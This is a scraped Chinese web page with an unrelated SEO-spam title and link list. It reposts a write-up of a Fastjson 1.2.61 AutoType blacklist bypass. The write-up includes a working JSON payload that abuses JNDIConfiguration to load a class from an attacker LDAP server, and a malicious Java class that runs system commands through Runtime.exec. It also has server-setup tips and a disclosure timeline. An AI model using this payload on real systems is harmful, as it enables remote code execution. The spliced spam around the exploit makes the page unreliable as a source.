当前位置: 首页 > news >正文

网站开发需要什么专业知识seo计费系统开发

news 2025/11/6 21:53:01
网站开发需要什么专业知识,seo计费系统开发,杭州企业宣传画册制作公司,代码转wordpress前言最近FastJson更新了黑名单,升级到了1.2.61版本,我尝试bypass其黑名单,在AutType打开的情况下成功绕过了黑名单防护.(目前暂未修复,官方即将更新)复现环境准备1.JDK 8U202.所需jar清单如下fastjson-1.2.61.jarcommons-configuration2-2.0.jarcommons-lang3-3.3.2.jarcommons… 前言最近FastJson更新了黑名单,升级到了1.2.61版本,我尝试bypass其黑名单,在AutType打开的情况下成功绕过了黑名单防护.(目前暂未修复,官方即将更新)复现环境准备1.JDK 8U202.所需jar清单如下fastjson-1.2.61.jarcommons-configuration2-2.0.jarcommons-lang3-3.3.2.jarcommons-logging-1.2.jarFastJson复现FastJsonTest.javaimport com.alibaba.fastjson.JSON;import com.alibaba.fastjson.JSONObject;import com.alibaba.fastjson.parser.ParserConfig;public class FastJsonTest {public static void main(String[] args){ ParserConfig.getGlobalInstance().setAutoTypeSupport(true); String jsonStr6 {\type\:\org.apache.commons.configuration2.JNDIConfiguration\,\prefix\:\ldap://127.0.0.1:1389/ExportObject\}; JSONObject json JSON.parseObject(jsonStr6); json.toJSONString(); }}恶意类ExportObject.javaimport java.io.BufferedReader;import java.io.InputStreamReader;public class ExportObject {public ExportObject() throws Exception { Process proc Runtime.getRuntime().exec(open /Applications/Calculator.app); BufferedReader br new BufferedReader(new InputStreamReader(proc.getInputStream())); StringBuffer sb new StringBuffer(); String line;while((line br.readLine()) ! null) { sb.append(line).append(\n); } String result sb.toString(); Exception e new Exception(result);throw e; }public static void main(String[] args) throws Exception { }}使用org.apache.commons.configuration2.JNDIConfiguration payload 效果如下关于黑名单Fastjson 在1.2.42版本开始,将原本明文的黑名单改成了hash value的黑名单使用这种方式,能在一定程度上减缓安全研究者对fastjson黑名单绕过的速度关于黑名单,有安全研究者在GitHub上开源了一个项目,叫做fastjson-blacklist,大家可以关注一下.后记对于不会开启rmi和ldap服务的同学可以查阅我的文章——《如何快速开启RMILDAP》快速开启http服务可以使用python -m SimpleHTTPServer.使用JNDI进行rce请注意JDK对于JNDI的修复可参考pyn3rd师傅的图Referencefastjson-blacklist:https://github.com/LeadroyaL/fastjson-blacklist/](https://github.com/LeadroyaL/fastjson-blacklist/fastjson官方黑名单:https://github.com/alibaba/fastjson/blob/master/src/main/java/com/alibaba/fastjson/parser/ParserConfig.java如何快速开启RMILDAP:https://mp.weixin.qq.com/s/TuQWvyro5vphyeZCAo_Y6g时间轴[0] 2019年9月20日 亚信安全提交该漏洞给阿里巴巴[1] 2019年9月23日 亚信安全网络攻防实验室发布预警公告
http://www.pierceye.com/news/49099/

相关文章:

  • 网站建设合同司法解释哪有做网站的 优帮云
  • 龙岗网站设计效果如何介绍设计的网站
  • 网站域名地址是什么广告设计公司朋友圈第一条怎么发
  • 程序员给女朋友做的网站三字型布局的网站
  • 江苏省义务教育标准化建设网站美橙域名查询网站
  • 济南营销型网站建设哪家好如何搭建虚拟专用网络
  • 网站域名在哪里注册重庆公众通
  • 做网站的都是什么专业毕业的设计外贸网站建设
  • 软件开发工资一般多少大专电商网站怎样做优化才最合理
  • 网站你懂我意思正能量免费长沙优化网站
  • 怎样在阿里巴巴做网站建个网址需要多少钱
  • 织梦程序如何搭建网站wordpress阅读时间
  • 电子商务网站建设 实验分析wordpress 3d标签云
  • 网站英文地图怎么做电脑上如何做课程视频网站
  • 云南网站建设工具南通网站建设计划书
  • window2008r2网站建设视频软件制作
  • 韶关建网站wordpress运动鞋模板
  • 无锡网站建设报价明细表宁波企业制作网站
  • 网页制作官方网站上海企业在线
  • 企业网站空间买虚拟主机专业做网站推广
  • 网站后台怎么做免费私人网站建设平台
  • 周口公司做网站枣庄做网站
  • app开发企业网站建设商家联盟营销方案
  • 网站模板带手机站专业做律师网站的公司
  • 网站建设的要求青岛网站建设哪里好
  • 公司做网站 手机 电脑做前端开发需要学什么
  • 网站在谷歌怎么做排名珠海网站建设杰作
  • 百度移动网站提交codeorg免费编程网站
  • 重庆渝兴建设有限公司网站天津工程新希望官网
  • 网站管理系统改不了的网站建设优化方法